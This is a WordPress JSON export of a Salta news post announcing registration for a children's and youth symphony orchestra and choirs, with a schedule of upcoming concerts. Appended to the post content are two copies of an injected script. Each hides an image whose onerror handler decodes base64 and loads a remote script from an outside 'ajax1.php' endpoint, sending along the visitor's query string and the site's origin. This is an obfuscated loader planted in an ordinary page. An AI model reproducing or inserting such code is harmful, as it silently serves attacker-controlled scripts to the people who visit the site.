{"id":3756,"date":"2024-02-27T10:19:17","date_gmt":"2024-02-27T13:19:17","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3756"},"modified":"2025-08-13T23:59:47","modified_gmt":"2025-08-14T02:59:47","slug":"inscripciones-para-formar-parte-de-la-orquesta-sinfonica-infantil-y-juvenil","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3756","title":{"rendered":"Inscripciones para formar parte de la Orquesta Sinf\u00f3nica Infantil y Juvenil"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background has-link-color wp-elements-cf4e4c43e24d2bdd32d42b3f4d2dc3ed\"><em>Hasta el 29 de febrero, se encuentran abiertas las preinscripciones para formar parte de Introducci\u00f3n musical, Coro infantil y Coro Juvenil durante el 2024.<\/em><\/h3>\n\n\n\n<p>Las inscripciones se encuentran abiertas hasta el 29 de febrero para ni\u00f1os a partir de 7 y 8 a\u00f1os que cuenten con primer grado aprobado. El formulario de preinscripci\u00f3n del Ciclo Lectivo 2024 del cuerpo formativo invita a participar de las siguientes especialidades:<\/p>\n\n\n\n<p>&#8211; Iniciaci\u00f3n Musical: De 7 y 8 a\u00f1os (Con 1\u00b0 grado escolar aprobado).<\/p>\n\n\n\n<p>&#8211; Coro Infantil: De 9 a 12 a\u00f1os.<\/p>\n\n\n\n<p>&#8211; Coro Juvenil: De 13 a 17 a\u00f1os.<\/p>\n\n\n\n<p><strong>FORMULARIO DE PRE INSCRIPCI\u00d3N<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-embed\"><div class=\"wp-block-embed__wrapper\">\nhttps:\/\/docs.google.com\/forms\/d\/e\/1FAIpQLSefjmNsY7LJ9Wv9SsAyFGAV73QuVQQg1GV1Ir7ep8f0JtYYpw\/viewform\n<\/div><\/figure>\n\n\n\n<p>La Orquesta Sinf\u00f3nica Infantil y Juvenil fue creada por Decreto N\u00ba2006\/05 con el fin de contribuir a trav\u00e9s de la educaci\u00f3n musical a la formaci\u00f3n de la persona. Dicha ense\u00f1anza complementaria est\u00e1 dirigida a ni\u00f1as, ni\u00f1os y adolescentes preferentemente entre 7 y 17 a\u00f1os de la Provincia de Salta en per\u00edodo de escolaridad obligatoria, para ayudarles a elegir dentro del potencial de sus talentos una ense\u00f1anza que responda a sus inclinaciones naturales y brindar un espacio de contenci\u00f3n y formaci\u00f3n en valores.<\/p>\n\n\n\n<p>La OSIJS es un proyecto sociocultural educativo de construcci\u00f3n colectiva que pone \u00e9nfasis en la formaci\u00f3n musical en un instrumento orquestal y brinda contenci\u00f3n e inclusi\u00f3n.<\/p>\n\n\n\n<p>Diariamente se dictan clases de t\u00e9cnica vocal, iniciaci\u00f3n y lenguaje musical, instrumento, ensambles, m\u00fasica de c\u00e1mara, ensayos de orquesta y coro. Adem\u00e1s ofrece clases magistrales, talleres, charlas y programas de extensi\u00f3n trabajando articuladamente en alianza con otros organismos.<\/p>\n\n\n\n<p><strong>Pr\u00f3ximas actividades<\/strong><\/p>\n\n\n\n<p>Hoy&nbsp;lunes 26 de febrero el Ensamble de Cuerdas \u201cC\u00e9sar Casas\u201d de los Grupos de Extensi\u00f3n se presentar\u00e1 con un repertorio popular en el Mercado Artesanal a las 20.30hs.<\/p>\n\n\n\n<p>Asimismo, el d\u00eda mi\u00e9rcoles 28 del corriente, en el Museo de Bellas Artes a las 18hs actuar\u00e1 el d\u00fao de clarinetes de la OSIJS integrado por Bran Liz\u00e1rraga y Osvaldo Maldonado con un repertorio para toda la familia.<\/p>\n\n\n\n<p>Finalmente, el jueves 29 de febrero en la explanada del Centro Cultural Am\u00e9rica a las 18hs. Los alumnos Mateo Toigo (bater\u00eda) y Valent\u00edn Fern\u00e1ndez (piano) de la OSIJS interpretar\u00e1n repertorio de Rock Nacional para salte\u00f1os y turistas.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/inscripciones-para-formar-parte-de-la-orquesta-sinfonica-infantil-y-juvenil-94333\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hasta el 29 de febrero, se encuentran abiertas las preinscripciones para formar parte de Introducci\u00f3n musical, Coro infantil y Coro Juvenil durante el 2024. Las inscripciones se encuentran abiertas hasta el 29 de febrero para ni\u00f1os a partir de 7 y 8 a\u00f1os que cuenten con primer grado aprobado. El formulario de preinscripci\u00f3n del Ciclo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3757,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11],"tags":[],"class_list":{"0":"post-3756","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3756"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3756"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3756\/revisions"}],"predecessor-version":[{"id":6841,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3756\/revisions\/6841"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3757"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3756"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3756"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3756"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}